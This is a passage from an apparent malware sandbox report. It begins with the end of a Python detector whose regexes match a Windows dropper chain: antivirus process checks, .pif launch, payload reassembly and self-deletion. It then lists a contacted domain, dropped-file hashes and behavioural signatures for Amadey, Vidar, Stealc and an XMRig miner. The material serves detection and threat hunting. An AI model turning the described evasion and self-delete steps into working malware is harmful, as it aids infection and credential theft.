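     re.compile(r"copy\s+(?P<src>\S+)\s+(?P<dst>\S+\.cmd)\s*&\s*(?P=dst)", re.I)),
    # delayed deletion of the payload plus removal of its working directory
    ("self-delete",
     re.compile(r'del\s+/f\s+/q\s+"(?P<target>[^"]+)"'
                r'(?:.*?rd\s+/s\s+/q\s+"(?P<dir>[^"]+)")?', re.I)),
    ("process-enumeration", re.compile(r"^tasklist\b", re.I)),
    # the findstr half of: tasklist | findstr /I "<security product images>"
    ("av-process-check",
     re.compile(r'^findstr\s+/I\s+"(?P<names>[^"]*\.exe[^"]*)"', re.I)),
    # findstr /V "<marker>" <file>: emit every line NOT carrying the decoy marker
    ("decoy-line-strip",
     re.compile(r'^findstr\s+/V\s+"(?P<junk>[^"]+)"\s+(?P<file>\S+)$', re.I)),
    ("staging-dir", re.compile(r"^cmd\s+/c\s+md\s+(?P<dir>\S+)$", re.I)),
    # copy /b <chunk(s)> <dest>: binary reassembly of a split payload
    ("binary-concat",
     re.compile(r"copy\s+/b\s+(?P<parts>.+?)\s+(?P<dest>\S+)$", re.I)),
    # a .pif launched directly; Windows runs it as a PE executable
    ("pif-launch", re.compile(r"^(?P<pif>\S+\.pif)(?:\s+(?P<arg>\S+))?", re.I)),
    ("delay", re.compile(r"^timeout\s+(?:/t\s+)?(?P<seconds>\d+)", re.I)),
]

# The stages that define this chain; all four must appear in this order.
CORE = ("renamed-batch-launch", "av-process-check", "pif-launch", "self-delete")


def detect(cmdlines: List[str]) -> List[Stage]:
    stages: List[Stage] = []
    for cl in cmdlines:
        for name, rx in RULES:
            m = rx.search(cl)
            if m:
                stages.append(Stage(name, cl, {k: v for k, v in m.groupdict().items() if v}))
                break
        else:
            stages.append(Stage("other", cl))
    return stages


def av_products_checked(stages: List[Stage]) -> List[str]:
    """Every process name the chain looked for in tasklist output."""
    names = set()
    for s in stages:
        if s.name == "av-process-check":
            names.update(s.indicators["names"].lower().split())
    return sorted(names)


def chain_detected(stages: List[Stage]) -> bool:
    """True when the defining stages all occur, in CORE order (subsequence match)."""
    pos = 0
    for s in stages:
        if pos < len(CORE) and s.name == CORE[pos]:
            pos += 1
    return pos == len(CORE)


if __name__ == "__main__":
    found = detect(SAMPLE_CMDLINES)
    for st in found:
        print(f"{st.name:22} {st.indicators}")
    print("chain detected:", chain_detected(found))
    print("AV processes checked:", av_products_checked(found))
```

The indicators it pulls out (the decoy marker, the chunk and destination names, the staging directory, the deleted path) are the strings worth searching for across an estate, since the same builder reuses them across samples far more often than it reuses file hashes.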

Network

Country Destination Domain Proto
US 8.8.8.8:53 WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi udp
US 8.8.8.8:53 theemir.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat

MD5 7f01361524f94ccde5107595e2c54200
SHA1 c1b34c5781d2f042c81c3a8128d2a9d5b7b7a084
SHA256 903bedd93e8ec45d8083f33181b8f64612c075bfddf55fc4fb5a5443f5c578dd
SHA512 bb19216799526c5c7f2bf1f29e529d63c2cd6f6cef0c9e3b236a8e90d836a655d0eb7f62a9aa91dcf8f1c8d8f0ea9753252a5e54f49768315844847196dae064

C:\Users\Admin\AppData\Local\Temp\Cologne

MD5 a7e0c610d9e51e1f07ed50a2698d841c
SHA1 856bf97f63d5b1629a73def5b539454e2bdf0925
SHA256 4458046d4cefd31f95c9844044f68b7fc95311a5e25d085a2882c6426d07977d
SHA512 60ab445f726323b9ea37eb328015dbf752065f9091d4ef19ccdf3c567e0ae731ba633a78334e245b7b5219f1580ccf8dc7790084255ae8bf143a559cbf11adc6

C:\Users\Admin\AppData\Local\Temp\Race

MD5 677c8b24ad59b6eef5dfb3faf7e0974a
SHA1 6e52ce41957b616aff5481493c30b7d84090a562
SHA256 b2f80e63c5e1073731a4656fa3e6d23d6cb7dd43d70ebea566b6bee00fee9bfd
SHA512 e013f8d3bbe9ebbf25635efb17d3554056c8318af4908825820dab0393d4ac9a26de55e4f168ba0cc84294a657680887b74b59d2b15c340b9a990021f6269c7a

C:\Users\Admin\AppData\Local\Temp\Reasons

MD5 99f7825b887660ea8f043d913522545b
SHA1 f6d36f0385ec836a40572bfcf605c8905b1a600a
SHA256 61ca2c5de8554fd7afe374c06203ea7832fdfff03f6512ef637328c66a6091a9
SHA512 ff1b9ff9aecf55b35c817e49adc0f580a45875976c462d03984eba97f93d57650da7724b42c2105eac0579c865c204e776ef762d984600c7e96fc574ace28cd2

C:\Users\Admin\AppData\Local\Temp\Estates

MD5 e3b5843f44d2382246054ea8b0706383
SHA1 a3036166a029bb1975129896e091daf40d820999
SHA256 2a790ae2e21ecf6c83b670a22509aeeca5a3ba67698cdd534817ff6e49957a84
SHA512 eac7c2bc9bfa0ad36a112b0f6878af59f9d6644e5f98842f069e741165d48d5c393790d939725c2d11606609a63ba1983c60753c3c9c4c4c273d49788190e2f8

C:\Users\Admin\AppData\Local\Temp\Changed

MD5 a2d24d16e1b5a0972e95b39e1d9a251b
SHA1 a5f7c2bcbbffef058fafe1b62c3825ce26ea5ed6
SHA256 c56805d59fc6c67afb039850fb018d90ee11ccdbecf6f7db0880f0d29e5e2a07
SHA512 8203f0ca64e37f40c923216a09216387ba9e0ef35fac7b3df1b409216ae8b4b85fb178d0622482ce04ac1cba68af938c75272b31ca3a740a1061103785e4cfad

C:\Users\Admin\AppData\Local\Temp\Lake

MD5 5ef48073ad8953dbc25cb95852577d58
SHA1 da11413d729915a120e16e15c47201ad1afd7157
SHA256 30c013ba41821acae05a5359ce75857ca66cdb03adf4560c6c0aaf2eff7b19a8
SHA512 172afe33b31994af02e8e3d13ca5a285d8869671d00fecd8e147dde26eb8e493cafbae9a60f6ef49eac8221a0e1176e625043539b2b321a934647539ae22d00d

C:\Users\Admin\AppData\Local\Temp\Timeline

MD5 3876d86dce4359c2e28a693d2c24577f
SHA1 373222b9a4d6f9116feac281725156f024a464fc
SHA256 30286f45ff66b72cc1a5c493442f5c57c0f2c7d729f663793c57c3b8dba4cf4d
SHA512 9289622b7e57f1ce380d41073ab42dc4376d3c156d8b82f60d166650a138c6190cf98ae35002ae11f5b31926dd92f3de3724d77f9e4ed2427151794a9b03fe7e

C:\Users\Admin\AppData\Local\Temp\Then

MD5 33271f00b044ed98071d84807c2158c8
SHA1 392e6351a844de7b50be3486db834321f625b7e1
SHA256 eaab5d35bea196961ffb36b423caed9d42a6cdf723759a67d5c865db6d906eb1
SHA512 0cc39c715573a5b2e81621e83dcdaa09b29530e044be223e0b62913aa77940f196429845fca46e0838781eecd6accacb7083b95bccf60f9f3fff37d096f8a788

C:\Users\Admin\AppData\Local\Temp\Fx

MD5 dfedbc594137615c08a79052a8f79e4b
SHA1 164812d22a6559b86883089a2b5b3cb2d97c320f
SHA256 7e2d5e98eefd6cc1fa44a4dda125c2d986ff0bd6b6af488213bc4992d3d6ee6e
SHA512 0ebd7c128464eaae4ba196a45201c646e669021f7a2005aa04471b521373474cc3dd8df55792585fd92bdbd6297a0fb31af18e72111fd8aa3bf39113bcb29235

C:\Users\Admin\AppData\Local\Temp\Vintage

MD5 278bae85379affaab937d9ec59eaa46d
SHA1 badcf501ff87624a68efb1ec3340d6314cc00027
SHA256 ae74ce2e63b5570786913b7f18c8bb79cd3f89d8a944a308ab036b39d7904edc
SHA512 9bfc82782f6318d4176f7fa7adad68d44421c76c179f5777e739f837d9ba5300453fbd9a1368eccbeccc24da9d1700db81f2128fde49547ed2ca86f1824ad391

C:\Users\Admin\AppData\Local\Temp\Destiny

MD5 ae51ee350f9b67d464fef7951cefe7ef
SHA1 109023e02149e2282322d285c00810a1cef0e3de
SHA256 658b597ecc79cf8cae6883b1bd37c014da410731d9ec9774b2952e8d9041793e
SHA512 bf84d806d2c10b331af8a195b654eaf7049c252db9120f72aff28cf263727b88fb432bb05f911afca7509c485f8df5b1c162ec91e4b88c76f0c19eb99f080f99

C:\Users\Admin\AppData\Local\Temp\Fighting

MD5 4a5d107b42961c4cc01ff0699b64629a
SHA1 6c31783eb1a0cf760515c21b2218f905f387c3cc
SHA256 04929738eb9987535c773a0ad904049369bc81fa6e36a35d3ff38e26d53cd696
SHA512 57dc197b44971214b61942b019609011c699f7f22972660e7f5d37e7e5cd2102501ae5d5f7b6e9031074cf9a730fbc8f128340dc640344996d0d34886f1e6b72

C:\Users\Admin\AppData\Local\Temp\Overnight

MD5 fb39a9bcb79f50bd7cd171f3c9325b96
SHA1 922d750974483d7ae4e40d873b1124835d6a865a
SHA256 04d5051668e69769a85b314d0c46556755dd11182c2982c5fac2792d62f152c0
SHA512 fe2ebb8412e8df722c0f8fd8682198654ad19707525f8bf2068d18104163e809621fef079f8f2cb6176e9897a764816144187c2b6214d2406e6a30e581d556d7

C:\Users\Admin\AppData\Local\Temp\Travelling

MD5 528985f09d3b53a80e38911b2086f45b
SHA1 8c2c8183f0883132dfe3d61a8afa5726cec9fefa
SHA256 79b144d737cbb862203146276c32deddcee0dcbe726cc877f40f0b0348a7f502
SHA512 1e661cf38f15abd8a852c01a1605eb19da137d8fb738885c72853c624066f1350cdb98205d3ed29ae286f4463dff2dca2881dddef8f7ac3ac6a9a017d8e7e842

C:\Users\Admin\AppData\Local\Temp\Flyer

MD5 9aec66d230b5a002f8e58e7c86fd5d11
SHA1 4486447e1c450f4c687ccef10433c428dd3e31d4
SHA256 0c8303cb00fe2838fbc27ffd8af0a0fc00045ce54efa40911b50f4e828edf1d6
SHA512 752119a11a7440a63602e77fa229d741078e3117b6e461b0d383a23f5059d0aef7b629eaf90abf5f2522997d0abab06e81bf258e8f823c22ce832fdb737e1fcc

C:\Users\Admin\AppData\Local\Temp\Lol

MD5 ac4c86188160adc4ea28ea1505dc18bb
SHA1 7e22e3f0d2d0aa2235b613df0413a73324dff760
SHA256 8d73e871d375f3802510b5212aba0e8ef929d62ed0396367cd3838ca7494b5b5
SHA512 a4ff143709eaddd00cd1062c940d051606039657722cc0944886a59282b8eaafed47004dcb90bf315f53acedfbdb93935fc49c2d2cf674870211854ca10b2692

C:\Users\Admin\AppData\Local\Temp\Worry

MD5 c715434dab2f93f0d1b6680c2b01b3fc
SHA1 355ea26f3a52b2c9abb457b9c56177a229cf9421
SHA256 05ddf26b6a74f039743ffd1d4d6152b8aa0add24da17aece71f9ccaa60538c4c
SHA512 7d39bf5a5362dd4d7ee51f4c963eb55cfdd3da46db093e288cec3db71c8b1bfaa304a64e539524fb62c397cd0a27c0890f3c93db4b591a84360bd47f23bfbc6a

C:\Users\Admin\AppData\Local\Temp\Impacts

MD5 315afae2384177766854966d0c39ead0
SHA1 baa183ea390760a631723c2f1494e0af8fb391e0
SHA256 229d27cf367f7844bdc9da75bcffc7c68a8b71aa1a31dd819f5ee4fe3bc42767
SHA512 384d2d0926af3ac4355461dd01e248d82b7f55a1a851d18c5ba892ba987472c13e8036e9e1a11806c8501595d19bc753290121903aa51d345af62381f6b815ab

C:\Users\Admin\AppData\Local\Temp\Fails

MD5 723321b7b3b33a2788e6cc0ba336c76d
SHA1 e17eb7189561d7f8b4fab76014124b780a3da4d7
SHA256 db1674bcd78442305a1a79773d17b61a6c5bbf830ce8e4983164c1f56198236a
SHA512 dd3c229f3b36cb07222663b8becac13df8d3a68874aee73ad20b11e18591085664ff9df27e9d84d9e9eedc00cc206db975049650f37d11bb666f1d690029c35e

C:\Users\Admin\AppData\Local\Temp\Therefore

MD5 cc32e2964f235bf9bddd71d4f7d3a9e2
SHA1 a570733cfce8d135315e86473b0ac6f6b4a4e763
SHA256 ec7c44500d11213688b83a04fb95c52b0d2c3ed2cc28d8d7e604f5b9336852f4
SHA512 3c3bea9699b4904e949c71ea40e72f39824837a9ed5251d1e1b5b857642bb2d6816c5d125255bb9272f599dd14d594fa820dacf22e8f72df424a419942e9ff8b

C:\Users\Admin\AppData\Local\Temp\Venezuela

MD5 47d9d9cdad725675c2dfa55ed4717db6
SHA1 d7bc49f9fae903accddf2da620dc5b9668f35dce
SHA256 d4be1b5210a95583cc8617ab58b5947b46abaf4f000960abcc774eee20751210
SHA512 4e12b065fc581460d137a0aebdffd3d56cfaf82b4d8be81bdfc3d4daf0897eda2230ab05166b35928b0b3c2f2cf0fb751ace6109b400d107a89797fefb5cf34e

C:\Users\Admin\AppData\Local\Temp\Ensures

MD5 5abe66470ddba2d1adc1ea359fb58b7d
SHA1 b914707d1f1b1c16dc03470cd8737a889292796c
SHA256 fecefcaab4d2499057061a01c13c3ec834ec4fcf13188e8708ad33cc3a6c6cb8
SHA512 5f95116f3f91ce9ed5d084e2c7b9df62892a633b3f45c3b714be8c34d39258d401e189297e49e15e8f497b88c2677f089473cd60e2e4806647fb7fc83471c0e2

C:\Users\Admin\AppData\Local\Temp\Noticed

MD5 90ab924a6bc6d90d922308452ce5c128
SHA1 4fd74c170817b9685b9230625fe7e47d54473829
SHA256 2ebfcd2eeaf8bc9561a1310ddc51e8759859e6523d0e8c73bb06969368ef88b2
SHA512 e93e506184d2b57abeb9601968bb0f53a06f78e8d08d3a5b5fd9f8b56a1e8709b2a48d3372e0a5d5152902a294c3b201176b35f60f7d4ee2636e15e0ca99b740

C:\Users\Admin\AppData\Local\Temp\Controversial

MD5 b8d54a8f7a866ce5950c2c67b18343ee
SHA1 95f12fbd6244ea3ecee9795ebd984a97bd056ef7
SHA256 8205f767c8dd7bb85316fe3f1988225c4bab822b39c03c412473f63f7fadddae
SHA512 1679d376069aab604f9c483623f1f7d53ca3792fa6dddb214360690186ec39662807149a7e525d797ee89d80bf742fb51a59beb0e053c4187b661bd8c954a164

C:\Users\Admin\AppData\Local\Temp\Expects

MD5 f9c59716c76e0d9aea1ed33432d0c0eb
SHA1 e017af5635025c7a5dddd5879e19f0e56cee5f63
SHA256 26deadb528299fc9567030e170fd608190da63a2cc0b8869565e4706329aee9b
SHA512 c24d790ae2ce1a66a5c9fd7eb15317cc25a2e16d28996eab7b46bea52b842ae20fcfc934edad5b70d8a0b66350db587057f346ca534e4b97fbb805693c6def61

C:\Users\Admin\AppData\Local\Temp\Banners

MD5 3f96912bd26122377de90bdf2b2adb43
SHA1 355135ae39c67bc1e8a34962db066b2d4862df22
SHA256 1025adb658535b34a6b1b162708f1d829e332bf7dfda6e389c5b676d2057b881
SHA512 6942ce7a6a09eaa4e4f897935d472d8a50cdc822d820e978eba449207ae42b65c86f5374226e4c1957ef9f8a7b3c26dfcdf45ec69edae9ce51173a0822c08174

C:\Users\Admin\AppData\Local\Temp\Tactics

MD5 2c9654e874efe5146131ed5422a715d9
SHA1 0e6d5c61f2b4821da4ecedd2a59eb6b023daa0e3
SHA256 2b35604cd27e82644be51f3266054f35b2415dd65abaa7b9b34f329fa14038e6
SHA512 bfba8ba24bc24899718d2d0b1f8948c1899c41b00624493bbd9a7c253cdee44a0f6e28d5db33473dafc3dbe6367fbdca2c062ea9cf21a15ef7ea53de8ce71c05

C:\Users\Admin\AppData\Local\Temp\Exception

MD5 2b79f9677d8663ccff67fbe4677a5065
SHA1 f63cbee04c6ae82b0f9ebaeeed8fbce7be51e7ed
SHA256 7b70774cca90f24dc9e1b889b6e277961ed7b61ed4cd8dbdd4642c65cb9b1ba9
SHA512 ce31599996e45e5aeb04b7d51e510711303471e85520986c91c4eac61a843c3d8e2b70851a1a6df0bf4b0825d417ac0b1b70822e93ab8f9523414effbef93619

C:\Users\Admin\AppData\Local\Temp\Voice

MD5 c01790f3cef20061f828578069162760
SHA1 72a450b13fd37f6c5c95d94240c51354316d5962
SHA256 328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b
SHA512 4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

C:\Users\Admin\AppData\Local\Temp\Abroad

MD5 6d4062e0f673dbe0a06ec227fe515c62
SHA1 c35c0ed445442d405ccfc78a20bbb86cf97526f6
SHA256 4e1c30452e317b04199626e8b7ca7f3b2c0c6b275715b1832533fcec030b72f4
SHA512 df953dbdb117c7ef3dbfcd266dee839f9a1ca4d50924f86d9620d0ca7a7fc9e3059caa955251e2327d46571ceb0b79dc53a2fef5b4b4f829ba33c436f982a921

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2632-212-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-213-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-215-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-216-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-217-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-218-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 12:36

Reported

2024-06-14 12:40

Platform

win11-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3524 created 3268 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\ProgramData\JKKEBGCGHI.exe N/A
N/A N/A C:\ProgramData\CBGCBGCAFI.exe N/A
N/A N/A C:\ProgramData\JKKEBGCGHI.exe N/A
N/A N/A C:\ProgramData\CBGCBGCAFI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\JKKEBGCGHI.exe N/A
N/A N/A C:\ProgramData\CBGCBGCAFI.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2096 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Setup (10).exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Setup (10).exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\Setup (10).exe C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 3432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 3432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 3432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 4272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 4272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 4272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3292 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3292 wrote to memory of 3524 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3292 wrote to memory of 2280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3292 wrote to memory of 2280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3292 wrote to memory of 2280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3524 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2820 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\JKKEBGCGHI.exe
PID 2820 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\JKKEBGCGHI.exe
PID 2820 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\JKKEBGCGHI.exe
PID 2820 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\CBGCBGCAFI.exe
PID 2820 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\CBGCBGCAFI.exe
PID 2820 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\CBGCBGCAFI.exe
PID 2952 wrote to memory of 4924 N/A C:\ProgramData\JKKEBGCGHI.exe C:\Windows\SysWOW64\ftp.exe
PID 2952 wrote to memory of 4924 N/A C:\ProgramData\JKKEBGCGHI.exe C:\Windows\SysWOW64\ftp.exe
PID 2952 wrote to memory of 4924 N/A C:\ProgramData\JKKEBGCGHI.exe C:\Windows\SysWOW64\ftp.exe
PID 5112 wrote to memory of 2352 N/A C:\ProgramData\CBGCBGCAFI.exe C:\Windows\SysWOW64\ftp.exe
